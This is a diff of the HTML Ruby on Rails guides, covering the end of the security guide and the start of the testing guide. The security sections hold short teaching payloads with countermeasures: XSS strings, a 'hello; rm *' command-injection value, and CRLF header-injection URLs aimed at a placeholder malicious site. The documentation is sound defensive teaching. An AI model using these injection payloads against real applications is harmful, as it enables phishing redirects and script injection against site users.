    @@ -1220,64 +1195,64 @@ s = sanitize(user_input, :tags => tags, :attributes => %w(href title))>> RedCloth.new('<script>alert(1)</script>').to_html => "<script>alert(1)</script>"
    -

    Use the :filter_html option to remove HTML which was not created by the Textile processor.

    +

    Use the :filter_html option to remove HTML which was not created by the Textile processor.

    >> RedCloth.new('<script>alert(1)</script>', [:filter_html]).to_html
     => "alert(1)"
    -

    However, this does not filter all HTML, a few tags will be left (by design), for example <a>:

    +

    However, this does not filter all HTML, a few tags will be left (by design), for example <a>:

    >> RedCloth.new("<a href='javascript:alert(1)'>hello</a>", [:filter_html]).to_html
     => "<p><a href="javascript:alert(1)">hello</a></p>"

    8.5.1. Countermeasures

    -

    It is recommended to use RedCloth in combination with a whitelist input filter, as described in the countermeasures against XSS.

    +

    It is recommended to use RedCloth in combination with a whitelist input filter, as described in the countermeasures against XSS.

    8.6. Ajax Injection

    -

    The same security precautions have to be taken for Ajax actions as for “normal” ones. There is at least one exception, however: The output has to be escaped in the controller already, if the action doesn't render a view.

    -

    If you use the in_place_editor plugin, or actions that return a string, rather than rendering a view, you have to escape the return value in the action. Otherwise, if the return value contains a XSS string, the malicious code will be executed upon return to the browser. Escape any input value using the h() method.

    +

    -- The same security precautions have to be taken for Ajax actions as for “normal” ones. There is at least one exception, however: The output has to be escaped in the controller already, if the action doesn’t render a view.

    +

    If you use the in_place_editor plugin, or actions that return a string, rather than rendering a view, you have to escape the return value in the action. Otherwise, if the return value contains a XSS string, the malicious code will be executed upon return to the browser. Escape any input value using the h() method.

    8.7. RJS Injection

    -

    Don't forget to escape in JavaScript (RJS) templates, too.

    -

    The RJS API generates blocks of JavaScript code based on Ruby code, thus allowing you to manipulate a view or parts of a view from the server side. If you allow user input in RJS templates, do escape it using escape_javascript() within JavaScript functions, and in HTML parts using h(). Otherwise an attacker could execute arbitrary JavaScript.

    +

    -- Don’t forget to escape in JavaScript (RJS) templates, too.

    +

    The RJS API generates blocks of JavaScript code based on Ruby code, thus allowing you to manipulate a view or parts of a view from the server side. If you allow user input in RJS templates, do escape it using escape_javascript() within JavaScript functions, and in HTML parts using h(). Otherwise an attacker could execute arbitrary JavaScript.

    8.8. Command Line Injection

    -

    Use user-supplied command line parameters with caution.

    -

    If your application has to execute commands in the underlying operating system, there are several methods in Ruby: exec(command), syscall(command), system(command) and `command`. You will have to be especially careful with these functions if the user may enter the whole command, or a part of it. This is because in most shells, you can execute another command at the end of the first one, concatenating them with a semicolon (;) or a vertical bar (|).

    -

    A countermeasure is to use the system(command, parameters) method which passes command line parameters safely.

    +

    -- Use user-supplied command line parameters with caution.

    +

    If your application has to execute commands in the underlying operating system, there are several methods in Ruby: exec(command), syscall(command), system(command) and `command`. You will have to be especially careful with these functions if the user may enter the whole command, or a part of it. This is because in most shells, you can execute another command at the end of the first one, concatenating them with a semicolon (;) or a vertical bar (|).

    +

    A countermeasure is to use the system(command, parameters) method which passes command line parameters safely.

    system("/bin/echo","hello; rm *")
     # prints "hello; rm *" and does not delete files

    8.9. Header Injection

    -

    HTTP headers are dynamically generated and under certain circumstances user input may be injected. This can lead to false redirection, XSS or HTTP response splitting.

    -

    HTTP request headers have a Referer, User-Agent (client software) and Cookie field, among others. Response headers for example have a status code, Cookie and Location (redirection target URL) field. All of them are user-supplied and may be manipulated with more or less effort. Remember to escape these header fields, too. For example when you display the user agent in an administration area.

    -

    Besides that, it is important to know what you are doing when building response headers partly based on user input. For example you want to redirect the user back to a specific page. To do that you introduced a “referer“ field in a form to redirect to the given address:

    +

    -- HTTP headers are dynamically generated and under certain circumstances user input may be injected. This can lead to false redirection, XSS or HTTP response splitting.

    +

    HTTP request headers have a Referer, User-Agent (client software) and Cookie field, among others. Response headers for example have a status code, Cookie and Location (redirection target URL) field. All of them are user-supplied and may be manipulated with more or less effort. Remember to escape these header fields, too. For example when you display the user agent in an administration area.

    +

    Besides that, it is important to know what you are doing when building response headers partly based on user input. For example you want to redirect the user back to a specific page. To do that you introduced a “referer“ field in a form to redirect to the given address:

    redirect_to params[:referer]
    -

    What happens is that Rails puts the string into the Location header field and sends a 302 (redirect) status to the browser. The first thing a malicious user would do, is this:

    +

    What happens is that Rails puts the string into the Location header field and sends a 302 (redirect) status to the browser. The first thing a malicious user would do, is this:

    http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld
    -

    And due to a bug in (Ruby and) Rails up to version 2.1.2 (excluding it), a hacker may inject arbitrary header fields; for example like this:

    +

    And due to a bug in (Ruby and) Rails up to version 2.1.2 (excluding it), a hacker may inject arbitrary header fields; for example like this:

    http://www.yourapplication.com/controller/action?referer=http://www.malicious.tld%0d%0aX-Header:+Hi!
     http://www.yourapplication.com/controller/action?referer=path/at/your/app%0d%0aLocation:+http://www.malicious.tld
    -

    Note that "%0d%0a" is URL-encoded for "\r\n" which is a carriage-return and line-feed (CRLF) in Ruby. So the resulting HTTP header for the second example will be the following because the second Location header field overwrites the first.

    +

    Note that "%0d%0a" is URL-encoded for "\r\n" which is a carriage-return and line-feed (CRLF) in Ruby. So the resulting HTTP header for the second example will be the following because the second Location header field overwrites the first.

    HTTP/1.1 302 Moved Temporarily
     (...)
     Location: http://www.malicious.tld
    -

    So attack vectors for Header Injection are based on the injection of CRLF characters in a header field. And what could an attacker do with a false redirection? He could redirect to a phishing site that looks the same as yours, but asks to login again (and sends the login credentials to the attacker). Or he could install malicious software through browser security holes on that site. Rails 2.1.2 escapes these characters for the Location field in the redirect_to method. Make sure you do it yourself when you build other header fields with user input.

    +

    So attack vectors for Header Injection are based on the injection of CRLF characters in a header field. And what could an attacker do with a false redirection? He could redirect to a phishing site that looks the same as yours, but asks to login again (and sends the login credentials to the attacker). Or he could install malicious software through browser security holes on that site. Rails 2.1.2 escapes these characters for the Location field in the redirect_to method. Make sure you do it yourself when you build other header fields with user input.

    8.9.1. Response Splitting

    -

    If Header Injection was possible, Response Splitting might be, too. In HTTP, the header block is followed by two CRLFs and the actual data (usually HTML). The idea of Response Splitting is to inject two CRLFs into a header field, followed by another response with malicious HTML. The response will be:

    +

    If Header Injection was possible, Response Splitting might be, too. In HTTP, the header block is followed by two CRLFs and the actual data (usually HTML). The idea of Response Splitting is to inject two CRLFs into a header field, followed by another response with malicious HTML. The response will be:

    HTTP/1.1 302 Found [First standard 302 response]
    @@ -1295,12 +1270,12 @@ Connection: Keep-Alive
     Transfer-Encoding: chunked
     Content-Type: text/html
    -

    Under certain circumstances this would present the malicious HTML to the victim. However, this seems to work with Keep-Alive connections, only (and many browsers are using one-time connections). But you can't rely on this. In any case this is a serious bug, and you should update your Rails to version 2.0.5 or 2.1.2 to eliminate Header Injection (and thus response splitting) risks.

    +

    Under certain circumstances this would present the malicious HTML to the victim. However, this seems to work with Keep-Alive connections, only (and many browsers are using one-time connections). But you can’t rely on this. In any case this is a serious bug, and you should update your Rails to version 2.0.5 or 2.1.2 to eliminate Header Injection (and thus response splitting) risks.

    9. Additional resources

    -

    The security landscape shifts and it is important to keep up to date, because missing a new vulnerability can be catastrophic. You can find additional resources about (Rails) security here:

    -
      +

      The security landscape shifts and it is important to keep up to date, because missing a new vulnerability can be catastrophic. You can find additional resources about (Rails) security here:

      +

      10. Changelog

      - -
        + +
        + +
      • + Functional Tests for Your Controllers +
      • + Integration Testing + +
      • +
      • + Rake Tasks for Running your Tests +
      • +
      • Brief Note About Test::Unit
      • @@ -255,8 +294,8 @@ ul#navMain {

        A Guide to Testing Rails Applications

        -

        This guide covers built-in mechanisms offered by Rails to test your application. By referring to this guide, you will be able to:

        -
          +

          This guide covers built-in mechanisms offered by Rails to test your application. By referring to this guide, you will be able to:

          +
          • Understand Rails testing terminology @@ -273,12 +312,12 @@ Identify other popular testing approaches and plugins

          -

          This guide won't teach you to write a Rails application; it assumes basic familiarity with the Rails way of doing things.

          +

          This guide won’t teach you to write a Rails application; it assumes basic familiarity with the Rails way of doing things.

        1. Why Write Tests for your Rails Applications?

        -
          +
          • Rails makes it super easy to write your tests. It starts by producing skeleton test code in background while you are creating your models and controllers. @@ -291,18 +330,18 @@ By simply running your Rails tests you can ensure your code adheres to the desir

          • -Rails tests can also simulate browser requests and thus you can test your application's response without having to test it through your browser. +Rails tests can also simulate browser requests and thus you can test your application’s response without having to test it through your browser.

        2. Introduction to Testing

        -

        Testing support was woven into the Rails fabric from the beginning. It wasn't an "oh! let's bolt on support for running tests because they're new and cool" epiphany. Just about every Rails application interacts heavily with a database - and, as a result, your tests will need a database to interact with as well. To write efficient tests, you'll need to understand how to set up this database and populate it with sample data.

        +

        Testing support was woven into the Rails fabric from the beginning. It wasn’t an "oh! let’s bolt on support for running tests because they’re new and cool" epiphany. Just about every Rails application interacts heavily with a database - and, as a result, your tests will need a database to interact with as well. To write efficient tests, you’ll need to understand how to set up this database and populate it with sample data.

        2.1. The 3 Environments

        -

        Every Rails application you build has 3 sides: a side for production, a side for development, and a side for testing.

        -

        One place you'll find this distinction is in the config/database.yml file. This YAML configuration file has 3 different sections defining 3 unique database setups:

        -
          +

          Every Rails application you build has 3 sides: a side for production, a side for development, and a side for testing.

          +

          One place you’ll find this distinction is in the config/database.yml file. This YAML configuration file has 3 different sections defining 3 unique database setups:

          +
          • production @@ -319,11 +358,11 @@ test

          -

          This allows you to set up and interact with test data without any danger of your tests altering data from your production environment.

          -

          For example, suppose you need to test your new delete_this_user_and_every_everything_associated_with_it function. Wouldn't you want to run this in an environment where it makes no difference if you destroy data or not?

          -

          When you do end up destroying your testing database (and it will happen, trust me), you can rebuild it from scratch according to the specs defined in the development database. You can do this by running rake db:test:prepare.

          +

          This allows you to set up and interact with test data without any danger of your tests altering data from your production environment.

          +

          For example, suppose you need to test your new delete_this_user_and_every_everything_associated_with_it function. Wouldn’t you want to run this in an environment where it makes no difference if you destroy data or not?

          +

          When you do end up destroying your testing database (and it will happen, trust me), you can rebuild it from scratch according to the specs defined in the development database. You can do this by running rake db:test:prepare.

          2.2. Rails Sets up for Testing from the Word Go

          -

          Rails creates a test folder for you as soon as you create a Rails project using rails application_name. If you list the contents of this folder then you shall see:

          +

          Rails creates a test folder for you as soon as you create a Rails project using rails application_name. If you list the contents of this folder then you shall see:

          $ ls -F test/
           
          -fixtures/       functional/     integration/    test_helper.rb  unit/
          -
          -

          The unit folder is meant to hold tests for your models, the functional folder is meant to hold tests for your controllers, and the integration folder is meant to hold tests that involve any number of controllers interacting. Fixtures are a way of organizing test data; they reside in the fixtures folder. The test_helper.rb file holds the default configuration for your tests.

          +fixtures/ functional/ integration/ test_helper.rb unit/
        +

        The unit folder is meant to hold tests for your models, the functional folder is meant to hold tests for your controllers, and the integration folder is meant to hold tests that involve any number of controllers interacting. Fixtures are a way of organizing test data; they reside in the fixtures folder. The test_helper.rb file holds the default configuration for your tests.

        2.3. The Low-Down on Fixtures

        -

        For good tests, you'll need to give some thought to setting up test data. In Rails, you can handle this by defining and customizing fixtures.

        +

        For good tests, you’ll need to give some thought to setting up test data. In Rails, you can handle this by defining and customizing fixtures.

        2.3.1. What Are Fixtures?

        -

        Fixtures is a fancy word for sample data. Fixtures allow you to populate your testing database with predefined data before your tests run. Fixtures are database independent and assume one of two formats: YAML or CSV. In this guide we will use YAML which is the preferred format.

        -

        You'll find fixtures under your test/fixtures directory. When you run script/generate model to create a new model, fixture stubs will be automatically created and placed in this directory.

        +

        Fixtures is a fancy word for sample data. Fixtures allow you to populate your testing database with predefined data before your tests run. Fixtures are database independent and assume one of two formats: YAML or CSV. In this guide we will use YAML which is the preferred format.

        +

        You’ll find fixtures under your test/fixtures directory. When you run script/generate model to create a new model, fixture stubs will be automatically created and placed in this directory.

        2.3.2. YAML

        -

        YAML-formatted fixtures are a very human-friendly way to describe your sample data. These types of fixtures have the .yml file extension (as in users.yml).

        -

        Here's a sample YAML fixture file:

        +

        YAML-formatted fixtures are a very human-friendly way to describe your sample data. These types of fixtures have the .yml file extension (as in users.yml).

        +

        Here’s a sample YAML fixture file:

        -
        <% %>
        -
        -

        tag is considered Ruby code. When this fixture is loaded, the size attribute of the three records will be set to 20/50, 20/2, and 20-69 respectively. The brightest_on attribute will also be evaluated and formatted by Rails to be compatible with the database.

        +
        <% %>
        +

        tag is considered Ruby code. When this fixture is loaded, the size attribute of the three records will be set to 20/50, 20/2, and 20-69 respectively. The brightest_on attribute will also be evaluated and formatted by Rails to be compatible with the database.

        2.3.4. Fixtures in Action

        -

        Rails by default automatically loads all fixtures from the test/fixtures folder for your unit and functional test. Loading involves three steps:

        -
          +

          Rails by default automatically loads all fixtures from the test/fixtures folder for your unit and functional test. Loading involves three steps:

          +
          • Remove any existing data from the table corresponding to the fixture @@ -408,7 +443,7 @@ Dump the fixture data into a variable in case you want to access it directly

          2.3.5. Hashes with Special Powers

          -

          Fixtures are basically Hash objects. As mentioned in point #3 above, you can access the hash object directly because it is automatically setup as a local variable of the test case. For example:

          +

          Fixtures are basically Hash objects. As mentioned in point #3 above, you can access the hash object directly because it is automatically setup as a local variable of the test case. For example:

          users(:david) # this will return the property for david called id -users(:david).id -
          -

          Fixtures can also transform themselves into the form of the original class. Thus, you can get at the methods only available to that class.

          +users(:david).id
      • +

        Fixtures can also transform themselves into the form of the original class. Thus, you can get at the methods only available to that class.

        david = users(:david).find # and now we have access to methods only available to a User class -email(david.girlfriend.email, david.location_tonight) -
        +email(david.girlfriend.email, david.location_tonight)

    3. Unit Testing your Models

    -

    In Rails, unit tests are what you write to test your models.

    -

    For this guide we will be using Rails scaffolding. It will create the model, a migration, controller and views for the new resource in a single operation. It will also create a full test suite following Rails best practises. I will be using examples from this generated code and would be supplementing it with additional examples where necessary.

    +

    In Rails, unit tests are what you write to test your models.

    +

    For this guide we will be using Rails scaffolding. It will create the model, a migration, controller and views for the new resource in a single operation. It will also create a full test suite following Rails best practises. I will be using examples from this generated code and would be supplementing it with additional examples where necessary.

    @@ -445,7 +478,7 @@ email(david.For more information on Rails scaffolding, refer to Getting Started with Rails
    -

    When you use script/generate scaffold, for a resource among other things it creates a test stub in the test/unit folder:

    +

    When you use script/generate scaffold, for a resource among other things it creates a test stub in the test/unit folder:

    $ script/generate scaffold post title:string body:text
    @@ -455,7 +488,7 @@ create  test/unit/post_test.rb
     create  test/fixtures/posts.yml
     ...
    -

    The default test stub in test/unit/post_test.rb looks like this:

    +

    The default test stub in test/unit/post_test.rb looks like this:

    def test_truth assert true end -end -
    -

    A line by line examination of this file will help get you oriented to Rails testing code and terminology.

    +end
    +

    A line by line examination of this file will help get you oriented to Rails testing code and terminology.

    -
    require 'test_helper'
    -
    -

    As you know by now that test_helper.rb specifies the default configuration to run our tests. This is included with all the tests, so any methods added to this file are available to all your tests.

    +
    require 'test_helper'
    +

    As you know by now that test_helper.rb specifies the default configuration to run our tests. This is included with all the tests, so any methods added to this file are available to all your tests.

    -
    class PostTest < ActiveSupport::TestCase
    -
    -

    The PostTest class defines a test case because it inherits from ActiveSupport::TestCase. PostTest thus has all the methods available from ActiveSupport::TestCase. You'll see those methods a little later in this guide.

    +
    class PostTest < ActiveSupport::TestCase
    +

    The PostTest class defines a test case because it inherits from ActiveSupport::TestCase. PostTest thus has all the methods available from ActiveSupport::TestCase. You’ll see those methods a little later in this guide.

    -
    def test_truth
    -
    -

    Any method defined within a test case that begins with test (case sensitive) is simply called a test. So, test_password, test_valid_password and testValidPassword all are legal test names and are run automatically when the test case is run.

    +
    def test_truth
    +

    Any method defined within a test case that begins with test (case sensitive) is simply called a test. So, test_password, test_valid_password and testValidPassword all are legal test names and are run automatically when the test case is run.

    -
    assert true
    -
    -

    This line of code is called an assertion. An assertion is a line of code that evaluates an object (or expression) for expected results. For example, an assertion can check:

    -
      +
      assert true
    +

    This line of code is called an assertion. An assertion is a line of code that evaluates an object (or expression) for expected results. For example, an assertion can check:

    +
    • is this value = that value? @@ -521,13 +549,13 @@ does this line of code throw an exception?

    • -is the user's password greater than 5 characters? +is the user’s password greater than 5 characters?

    -

    Every test contains one or more assertions. Only when all the assertions are successful the test passes.

    +

    Every test contains one or more assertions. Only when all the assertions are successful the test passes.

    3.1. Preparing you Application for Testing

    -

    Before you can run your tests you need to ensure that the test database structure is current. For this you can use the following rake commands:

    +

    Before you can run your tests you need to ensure that the test database structure is current. For this you can use the following rake commands:

    $ rake db:migrate
     ...
    -$ rake db:test:load
    -
    -

    Above rake db:migrate runs any pending migrations on the developemnt environment and updates db/schema.rb. rake db:test:load recreates the test database from the current db/schema.rb. On subsequent attempts it is a good to first run db:test:prepare as it first checks for pending migrations and warns you appropriately.

    +$ rake db:test:load +

    Above rake db:migrate runs any pending migrations on the developemnt environment and updates db/schema.rb. rake db:test:load recreates the test database from the current db/schema.rb. On subsequent attempts it is a good to first run db:test:prepare as it first checks for pending migrations and warns you appropriately.

    - +
    Note db:test:prepare will fail with an error if db/schema.rb doesn't exists.db:test:prepare will fail with an error if db/schema.rb doesn’t exists.

    3.1.1. Rake Tasks for Preparing your Application for Testing

    +
    + +++ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Tasks Description

    rake db:test:clone

    Recreate the test database from the current environment’s database schema

    rake db:test:clone_structure

    Recreate the test databases from the development structure

    rake db:test:load

    Recreate the test database from the current schema.rb

    rake db:test:prepare

    Check for pending migrations and load the test schema

    rake db:test:purge

    Empty the test database.

    +
    +
    + + + +
    +Tip +You can see all these rake tasks and their descriptions by running rake \-\-tasks \-\-describe
    +
    +

    3.2. Running Tests

    +

    Running a test is as simple as invoking the file containing the test cases through Ruby:

    -
    -
    Tasks                           Description
    -
    -

    rake db:test:clone Recreate the test database from the current environment's database schema -rake db:test:clone_structure Recreate the test databases from the development structure -rake db:test:load Recreate the test database from the current schema.rb -rake db:test:prepare Check for pending migrations and load the test schema -rake db:test:purge Empty the test database.

    -
    -
    -
    
    -TIP: You can see all these rake tasks and their descriptions by running +rake \-\-tasks \-\-describe+
    -
    -=== Running Tests ===
    -
    -Running a test is as simple as invoking the file containing the test cases through Ruby:
    +
    +
    $ cd test
    +$ ruby unit/post_test.rb
     
    -[source, shell]
    -
    -

    $ cd test -$ ruby unit/post_test.rb

    -

    Loaded suite unit/post_test +Loaded suite unit/post_test Started -. -Finished in 0.023513 seconds.

    -

    1 tests, 1 assertions, 0 failures, 0 errors

    +. +Finished in 0.023513 seconds. + +1 tests, 1 assertions, 0 failures, 0 errors
    +

    This will run all the test methods from the test case.

    +

    You can also run a particular test method from the test case by using the -n switch with the test method name.

    -
    
    -This will run all the test methods from the test case.
    +
    $ ruby unit/post_test.rb -n test_truth
     
    -You can also run a particular test method from the test case by using the +-n+ switch with the +test method name+.
    -
    -

    $ ruby unit/post_test.rb -n test_truth

    -

    Loaded suite unit/post_test +Loaded suite unit/post_test Started . -Finished in 0.023513 seconds.

    -

    1 tests, 1 assertions, 0 failures, 0 errors

    -
    -
    -
    
    -The +.+ (dot) above indicates a passing test. When a test fails you see an +F+; when a test throws an error you see an +E+ in its place. The last line of the output is the summary.
    -
    -To see how a test failure is reported, you can add a failing test to the +post_test.rb+ test case.
    +Finished in 0.023513 seconds.
     
    -[source,ruby]
    +1 tests, 1 assertions, 0 failures, 0 errors
    -

    def test_should_not_save_post_without_title - post = Post.new - assert !post.save -end

    +

    The . (dot) above indicates a passing test. When a test fails you see an F; when a test throws an error you see an E in its place. The last line of the output is the summary.

    +

    To see how a test failure is reported, you can add a failing test to the post_test.rb test case.

    +
    +
    +
    def test_should_not_save_post_without_title
    +  post = Post.new
    +  assert !post.save
    +end
    +

    Let us run this newly added test.

    -
    
    -Let us run this newly added test.
    -
    -

    $ ruby unit/post_test.rb -n test_should_not_save_post_without_title +

    $ ruby unit/post_test.rb -n test_should_not_save_post_without_title
     Loaded suite unit/post_test
     Started
     F
    -Finished in 0.197094 seconds.

    -
    -
    -
      1) Failure:
    +Finished in 0.197094 seconds.
    +
    +  1) Failure:
     test_should_not_save_post_without_title(PostTest)
         [unit/post_test.rb:11:in `test_should_not_save_post_without_title'
          /opt/local/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/testing/setup_and_teardown.rb:33:in `__send__'
          /opt/local/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/testing/setup_and_teardown.rb:33:in `run']:
    -<false> is not true.
    -
    -

    1 tests, 1 assertions, 1 failures, 0 errors

    -
    -
    -
    
    -In the output, +F+ denotes a failure. You can see the corresponding trace shown under +1)+ along with the name of the failing test. The next few lines contain the stack trace followed by a message which mentions the actual value and the expected value by the assertion. The default assertion messages provide just enough information to help pinpoint the error. To make the assertion failure message more readable every assertion provides an optional message parameter, as shown here:
    +<false> is not true.
     
    -[source,ruby]
    +1 tests, 1 assertions, 1 failures, 0 errors
    -

    def test_should_not_save_post_without_title - post = Post.new - assert !post.save, "Saved the post without a title" -end

    +

    In the output, F denotes a failure. You can see the corresponding trace shown under 1) along with the name of the failing test. The next few lines contain the stack trace followed by a message which mentions the actual value and the expected value by the assertion. The default assertion messages provide just enough information to help pinpoint the error. To make the assertion failure message more readable every assertion provides an optional message parameter, as shown here:

    +
    +
    +
    def test_should_not_save_post_without_title
    +  post = Post.new
    +  assert !post.save, "Saved the post without a title"
    +end
    +

    Running this test shows the friendlier assertion message:

    -
    
    -Running this test shows the friendlier assertion message:
    -
    -

    $ ruby unit/post_test.rb -n test_should_not_save_post_without_title +

    $ ruby unit/post_test.rb -n test_should_not_save_post_without_title
     Loaded suite unit/post_test
     Started
     F
    -Finished in 0.198093 seconds.

    -
    -
    -
      1) Failure:
    +Finished in 0.198093 seconds.
    +
    +  1) Failure:
     test_should_not_save_post_without_title(PostTest)
         [unit/post_test.rb:11:in `test_should_not_save_post_without_title'
          /opt/local/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/testing/setup_and_teardown.rb:33:in `__send__'
          /opt/local/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/testing/setup_and_teardown.rb:33:in `run']:
     Saved the post without a title.
    -<false> is not true.
    -
    -

    1 tests, 1 assertions, 1 failures, 0 errors

    -
    -
    -
    
    -Now to get this test to pass we can add a model level validation for the _title_ field.
    +<false> is not true.
     
    -[source,ruby]
    +1 tests, 1 assertions, 1 failures, 0 errors
    -

    class Post < ActiveRecord::Base - validates_presence_of :title -end

    +

    Now to get this test to pass we can add a model level validation for the title field.

    +
    +
    +
    class Post < ActiveRecord::Base
    +  validates_presence_of :title
    +end
    +

    Now the test should pass. Let us verify by running the test again:

    -
    
    -Now the test should pass. Let us verify by running the test again:
    -
    -

    $ ruby unit/post_test.rb -n test_should_not_save_post_without_title +

    $ ruby unit/post_test.rb -n test_should_not_save_post_without_title
     Loaded suite unit/post_test
     Started
     .
    -Finished in 0.193608 seconds.

    -

    1 tests, 1 assertions, 0 failures, 0 errors

    -
    -
    -
    
    -Now if you noticed we first wrote a test which fails for a desired functionality, then we wrote some code which adds the functionality and finally we ensured that our test passes. This approach to software development is referred to as _Test-Driven Development_ (TDD).
    -
    -TIP: Many Rails developers practice _Test-Driven Development_ (TDD). This is an excellent way to build up a test suite that exercises every part of your application. TDD is beyond the scope of this guide, but one place to start is with link:http://andrzejonsoftware.blogspot.com/2007/05/15-tdd-steps-to-create-rails.html[15 TDD steps to create a Rails application].
    +Finished in 0.193608 seconds.
     
    -To see how an error gets reported, here's a test containing an error:
    -
    -[source,ruby]
    +1 tests, 1 assertions, 0 failures, 0 errors
    -

    def test_should_report_error - # some_undefined_variable is not defined elsewhere in the test case +

    Now if you noticed we first wrote a test which fails for a desired functionality, then we wrote some code which adds the functionality and finally we ensured that our test passes. This approach to software development is referred to as Test-Driven Development (TDD).

    +
    + + + +
    +Tip +Many Rails developers practice Test-Driven Development (TDD). This is an excellent way to build up a test suite that exercises every part of your application. TDD is beyond the scope of this guide, but one place to start is with 15 TDD steps to create a Rails application.
    +
    +

    To see how an error gets reported, here’s a test containing an error:

    +
    +
    +
    def test_should_report_error
    +  # some_undefined_variable is not defined elsewhere in the test case
       some_undefined_variable
    -  assert true
    -end

    + assert true +end
    +

    Now you can see even more output in the console from running the tests:

    -
    
    -Now you can see even more output in the console from running the tests:
    -
    -

    $ ruby unit/post_test.rb -n test_should_report_error +

    $ ruby unit/post_test.rb -n test_should_report_error
     Loaded suite unit/post_test
     Started
     E
    -Finished in 0.195757 seconds.

    -
    -
    -
      1) Error:
    +Finished in 0.195757 seconds.
    +
    +  1) Error:
     test_should_report_error(PostTest):
     NameError: undefined local variable or method `some_undefined_variable' for #<PostTest:0x2cc9de8>
         /opt/local/lib/ruby/gems/1.8/gems/actionpack-2.1.1/lib/action_controller/test_process.rb:467:in `method_missing'
         unit/post_test.rb:16:in `test_should_report_error'
         /opt/local/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/testing/setup_and_teardown.rb:33:in `__send__'
    -    /opt/local/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/testing/setup_and_teardown.rb:33:in `run'
    -
    -

    1 tests, 0 assertions, 0 failures, 1 errors

    -
    -
    -
    
    -Notice the 'E' in the output. It denotes a test with error.
    -
    -NOTE: The execution of each test method stops as soon as any error or a assertion failure is encountered, and the test suite continues with the next method. All test methods are executed in alphabetical order.
    -
    -=== What to Include in Your Unit Tests ===
    -
    -Ideally you would like to include a test for everything which could possibly break. It's a good practice to have at least one test for each of your validations and at least one test for every method in your model.
    -
    -=== Assertions Available ===
    +    /opt/local/lib/ruby/gems/1.8/gems/activesupport-2.1.1/lib/active_support/testing/setup_and_teardown.rb:33:in `run'
     
    -By now you've caught a glimpse of some of the assertions that are available. Assertions are the worker bees of testing. They are the ones that actually perform the checks to ensure that things are going as planned.
    -
    -There are a bunch of different types of assertions you can use. Here's the complete list of assertions that ship with +test/unit+, the testing library used by Rails. The +[msg]+ parameter is an optional string message you can specify to make your test failure messages clearer. It's not required.
    -
    -[grid="all"]
    -`-----------------------------------------------------------------`------------------------------------------------------------------------
    -Assertion                                                         Purpose
    +1 tests, 0 assertions, 0 failures, 1 errors
    -

    assert( boolean, [msg] ) Ensures that the object/expression is true. -assert_equal( obj1, obj2, [msg] ) Ensures that obj1 == obj2 is true. -assert_not_equal( obj1, obj2, [msg] ) Ensures that obj1 == obj2 is false. -assert_same( obj1, obj2, [msg] ) Ensures that obj1.equal?(obj2) is true. -assert_not_same( obj1, obj2, [msg] ) Ensures that obj1.equal?(obj2) is false. -assert_nil( obj, [msg] ) Ensures that obj.nil? is true. -assert_not_nil( obj, [msg] ) Ensures that obj.nil? is false. -assert_match( regexp, string, [msg] ) Ensures that a string matches the regular expression. -assert_no_match( regexp, string, [msg] ) Ensures that a string doesn't matches the regular expression. -assert_in_delta( expecting, actual, delta, [msg] ) Ensures that the numbers expecting and actual are within delta of each other. -assert_throws( symbol, [msg] ) { block } Ensures that the given block throws the symbol. -assert_raises( exception1, exception2, … ) { block } Ensures that the given block raises one of the given exceptions. -assert_nothing_raised( exception1, exception2, … ) { block } Ensures that the given block doesn't raise one of the given exceptions. -assert_instance_of( class, obj, [msg] ) Ensures that obj is of the class type. -assert_kind_of( class, obj, [msg] ) Ensures that obj is or descends from class. -assert_respond_to( obj, symbol, [msg] ) Ensures that obj has a method called symbol. -assert_operator( obj1, operator, obj2, [msg] ) Ensures that obj1.operator(obj2) is true. -assert_send( array, [msg] ) Ensures that executing the method listed in array[1] on the object in array[0] with the parameters of array[2 and up] is true. This one is weird eh? -flunk( [msg] ) Ensures failure. This is useful to explicitly mark a test that isn't finished yet.

    +

    Notice the E in the output. It denotes a test with error.

    +
    + + + +
    +Note +The execution of each test method stops as soon as any error or a assertion failure is encountered, and the test suite continues with the next method. All test methods are executed in alphabetical order.
    +
    +

    3.3. What to Include in Your Unit Tests

    +

    Ideally you would like to include a test for everything which could possibly break. It’s a good practice to have at least one test for each of your validations and at least one test for every method in your model.

    +

    3.4. Assertions Available

    +

    By now you’ve caught a glimpse of some of the assertions that are available. Assertions are the worker bees of testing. They are the ones that actually perform the checks to ensure that things are going as planned.

    +

    There are a bunch of different types of assertions you can use. Here’s the complete list of assertions that ship with test/unit, the testing library used by Rails. The [msg] parameter is an optional string message you can specify to make your test failure messages clearer. It’s not required.

    +
    + +++ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Assertion Purpose

    assert( boolean, [msg] )

    Ensures that the object/expression is true.

    assert_equal( obj1, obj2, [msg] )

    Ensures that obj1 == obj2 is true.

    assert_not_equal( obj1, obj2, [msg] )

    Ensures that obj1 == obj2 is false.

    assert_same( obj1, obj2, [msg] )

    Ensures that obj1.equal?(obj2) is true.

    assert_not_same( obj1, obj2, [msg] )

    Ensures that obj1.equal?(obj2) is false.

    assert_nil( obj, [msg] )

    Ensures that obj.nil? is true.

    assert_not_nil( obj, [msg] )

    Ensures that obj.nil? is false.

    assert_match( regexp, string, [msg] )

    Ensures that a string matches the regular expression.

    assert_no_match( regexp, string, [msg] )

    Ensures that a string doesn’t matches the regular expression.

    assert_in_delta( expecting, actual, delta, [msg] )

    Ensures that the numbers expecting and actual are within delta of each other.

    assert_throws( symbol, [msg] ) { block }

    Ensures that the given block throws the symbol.

    assert_raises( exception1, exception2, ... ) { block }

    Ensures that the given block raises one of the given exceptions.

    assert_nothing_raised( exception1, exception2, ... ) { block }

    Ensures that the given block doesn’t raise one of the given exceptions.

    assert_instance_of( class, obj, [msg] )

    Ensures that obj is of the class type.

    assert_kind_of( class, obj, [msg] )

    Ensures that obj is or descends from class.

    assert_respond_to( obj, symbol, [msg] )

    Ensures that obj has a method called symbol.

    assert_operator( obj1, operator, obj2, [msg] )

    Ensures that obj1.operator(obj2) is true.

    assert_send( array, [msg] )

